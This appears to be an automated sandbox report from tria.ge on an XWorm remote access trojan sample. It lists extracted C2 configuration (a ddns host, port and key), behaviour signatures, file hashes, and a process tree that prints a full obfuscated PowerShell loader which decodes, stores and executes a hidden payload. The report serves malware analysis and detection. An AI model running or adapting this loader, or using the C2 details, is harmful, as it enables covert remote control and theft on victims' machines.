Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
53s -
max time network
58s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
-
submitted
01/03/2025, 18:49
General
-
Target
https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel
Malware Config
Extracted
xworm
5.0
meowycatty.ddns.net:8843
jRccj8SKwN7fQIlB
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 2 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 21 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1932 -parentBuildID 20240401114208 -prefsHandle 1860 -prefMapHandle 1824 -prefsLen 27661 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e88c5128-b496-415e-8ef0-112f0276ee9d} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2352 -parentBuildID 20240401114208 -prefsHandle 2324 -prefMapHandle 2312 -prefsLen 28581 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {341244c1-6aaf-4452-8b57-13fed7f3cc33} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" socket3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3364 -childID 1 -isForBrowser -prefsHandle 3356 -prefMapHandle 3352 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea1bee39-8c62-4d6c-ae97-ba5eef0c5de1} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3760 -childID 2 -isForBrowser -prefsHandle 2920 -prefMapHandle 2760 -prefsLen 33071 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f39d9dfa-f0c5-42b7-99b7-d104c7c6c3b8} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4480 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4436 -prefMapHandle 4468 -prefsLen 33071 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9548cbe-963f-47df-8c98-27109c248991} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" utility3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 3 -isForBrowser -prefsHandle 5660 -prefMapHandle 5656 -prefsLen 27266 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8da36236-aa19-4ace-afb5-2ee8411f8d9b} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5688 -childID 4 -isForBrowser -prefsHandle 5672 -prefMapHandle 5668 -prefsLen 27266 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84d3892f-e8f5-4779-a23b-b04f9f52616f} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5316 -childID 5 -isForBrowser -prefsHandle 5916 -prefMapHandle 5828 -prefsLen 27266 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d166e122-3b21-4244-a47f-9a4aa90844be} 3692 "\\.\pipe\gecko-crash-server-pipe.3692" tab3⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\krTVmufRVRif.bat"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:xrDrGAvriu;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path;};$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-loJDe' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5a1ae0d19d13ff6334f37c6f0a63fa9cd
SHA1f253ca100bea647bfaac3856416029f90000051e
SHA25643a07e07aa2916a340bfebc62826b2500c220bdf19fbb06eba574f956a69edac
SHA512b0a7d9472a00d8eea5905600aa2048df7cc24b6e51a071217549ad9a25fed0f433354a9566d9b341fdbe5a16ea82554c7220efc76abc475a558467f57b674eb5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
10KB
MD5d8d0925f3996841e32a5029ad981bd66
SHA16fd5a1ab77a8363df1c1ffb33d9f3c91c8827f6e
SHA2568e69edf961e707e228b5b2a642810fcc39109645d07f99379bfc2d6ba849015a
SHA512588599f499e2c8c37bb402143da33d463f27c9eb16eed3fe72c20d88228fdf44365efb46c27a0ffe8c9b3af6f7d680b746ecf63450fb27a2f985fd403f637f15
-
Filesize
5KB
MD5680262519d19c33fbac4dfac8cfa2da4
SHA1fd8134a5892ff5eb26acb02c157cc5d29fb57a6d
SHA2561119c4ed4d08e32406c7473ed955f933b2ed9e8f42caba5242e4acde513ed4fe
SHA512dc994f342cbd27b541aa250ed37031fcb3b038253698286ad6a80f0fbbea390d1dc92b251ffb67acf661c161159bd4f22518fbcd6c2191c24bd9a3f84e39ebf0
-
Filesize
5KB
MD5fd95027481e1dbccd2ceafc1a5c95ee2
SHA1fb11eb26908d7d9b95c41f5f6a00aacf0f3502d1
SHA256cb7a4f6eca2308f0278296c74c0ae746b9ec46b8ea628902de4ef9fcfa0d49b9
SHA512e786cb711a9b17740bdc703d77573cc0648bc502caf1ab4a7f967d287f6e5bd084c04bf0c78e2f0fd31484eccffb01a289c9e84ed7c8294aa4ffebee2ebeda77
-
Filesize
6KB
MD53f25fcfa2d8cdbfc815977c72b536679
SHA154736b0da6b7216e47a2a4b7a5e81c7945590f6c
SHA256872a79824934b3681363c79551f499360282e1659c0ab9b8518fb4f0bcbd0982
SHA512ba7027fcb0286a8a637e0867b836b78ca2e052a0b966aa61614ecf9c3a64d240bbb4a76eefd86da064ccfb9fb3a0435c31db9419805306b08cf37f21bd1f44c3
-
Filesize
6KB
MD566056b6de383a222d61126d1c6030d2c
SHA17ee840ec31e57f39e74af25353e94121b4284b7f
SHA2564c31217f13347ee539fa9501134c908949fd9ff016342d87977fcfb399c738b0
SHA512db529e85c83961034a4d8932482e488166d79e1629acdf7ec3ee8f625f11282622c06cee1d19edbe867a99f8133b9cf508f42e137b7e76fec2fbf01d51d21494
-
Filesize
982B
MD58603e9bde09922bce8320129a26c04a4
SHA10cc197ad8826264a26ab19cdf24721477c44eaf5
SHA2562a33b850d30dc0f80ee30a4dd32044faaa6faf054b6e3c2f147ce79f57adbb72
SHA5123ceb4c3a087eb8dafa3a17cf3cf959a7b70ed57ca41cd7a8c16a8e27b839bf497bc6231ae37700f6f692e0e9cf91978704746a2eb1a3732103912b0108d48ec4
-
Filesize
24KB
MD520c91be522ccb3165645d1dbc95cfbb4
SHA11ba0ec55c7602f8daedd045caf064d26229bbc4b
SHA256c15779077cddc68d5ae0726a5a6b7d4daa6c6d4ff96379bcd9a2416d1738c40f
SHA51277dc42ccd136fe1eb35ae587e24f8d5475c49bbb580f7a0bc47563f66ce88f1efd189ed52f5ba44ae7aa15b19daaa198b87c32319a35c06db2114d1024e8d898
-
Filesize
671B
MD545b422e4b4806afcd212ad969bf154a6
SHA1086d8e5e13e3de460a0ef50037da74ad1faf1e6d
SHA25628eb2b98064d6e4fae0b3a3c739156ac5097e05b3a0c17b8fbc3e71eec993f0b
SHA5126bb2219f8f43cbfe04ee25780828789b54a228a88f165385b63a3e5dff5089ac8ce53f1dbb19016daebeac3d894b3e1478172ba5c7bb7f25935b339c410a2b27
-
Filesize
1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
Filesize
116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
Filesize
372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
Filesize
17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD505a79a3c31c71baf3cd1405ea5d127b1
SHA1fad1fe4f5a92ba11bacc8159db3f931c32ba4c26
SHA256b2d59fadfd7e489d37ba8aceb8d36569433a33eebb2aaa33c3533729490824b8
SHA5129abc20b153a1411b50bab67491d3f0f9dc72cc6930a93d060b76a07c9e1d6186786155d7b6a0e619c7925ef965fa1bc09b742c1bbca5eb3bd98d2efd498c0966
-
Filesize
10KB
MD525a02d39b3be495a8b8083d5ab277b9a
SHA17c24c24ed4221d416d866b6bedd257094e0fd685
SHA256131c76854ce79f8a80021d492ef2eae50a69c28b59cafa0402b49f29c8f93112
SHA512105a4c49a919d6a0156dd6611e4c4563ce433c1a14b00b4fb5eac6e6cffee96368325a90b501d36ca9ecf311ac93009b661cb22df90d95afb091b1852aca359c
-
Filesize
10KB
MD5cbb991cc847193550906b91d8b024f9e
SHA149780c0f14da702a30f8b933f84449f3b40d77a3
SHA256cff9ab538e0ed72a0c4a4b623f2dc72c5263e70b773ac72184f7f5245eee3468
SHA5127946e87cbfc997fc1ee07ac23222689709b5679acfa7208d081684c25c1d3cd066a8423ad3218f33f76abc424baa5f06dad87dc13c196e94e273d4f7d3580ca9
-
Filesize
4.3MB
MD5c475591ab334bd766b868d4d706938db
SHA10e89e12020e858db58b4f8e250c6fea7e03ed95e
SHA25638908b3b24f91dd837b7f3730f9e0258337f26274ce71bc2f299c5662247fcf6
SHA5123611b20c0f2918abb33c7869a3755ad78a274dfaab8c69768bd3e3a8762837dedb8b45c64133133dd6d60b8986ca9cfb0db79c0b27cb9bb4cbd7138f286bc28b
-
Filesize
32KB
-
Filesize
56KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
756KB
-
Filesize
2.0MB
-
Filesize
352KB
-
Filesize
1.2MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
48KB